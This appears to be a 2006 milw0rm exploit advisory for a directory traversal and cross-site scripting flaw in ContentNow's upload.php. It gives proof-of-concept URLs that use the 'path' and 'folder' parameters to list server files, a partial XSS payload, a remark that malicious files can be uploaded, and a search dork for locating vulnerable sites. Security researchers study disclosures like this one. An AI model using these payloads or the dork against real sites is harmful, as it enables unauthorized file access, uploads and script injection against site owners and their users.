ContentNow Directory Traversal(upload.php) ------------------------------------------ -vulnerability By: Timq -http://securitydb.org -Team Root-Shell -Email:timq[at]hushmail.com ------------------------------------------ It appears that it is possible to view any files on a system via 'upload.php'. Proper filtering not in affectfor the 'path' and 'folder' variables. You can also upload malicious files to where you have access through 'upload.php'. ------------------------------------------ ~PoC ------------------------------------------ http://site.com/cn/upload.php?path=/ http://site.com/cn/upload.php?folder=/ XSS: http://site.com/cn/upload.php?path="> D0rk: intitle:intitle:ContentNow ------------------------------------------ shouts:Warpboy,Zeusixsixsix,Stansar,Preddy,OG,PunkerX,Ethernet,str0ke,Gamma,Maggot everyone else ------------------------------------------ # milw0rm.com [2006-11-14]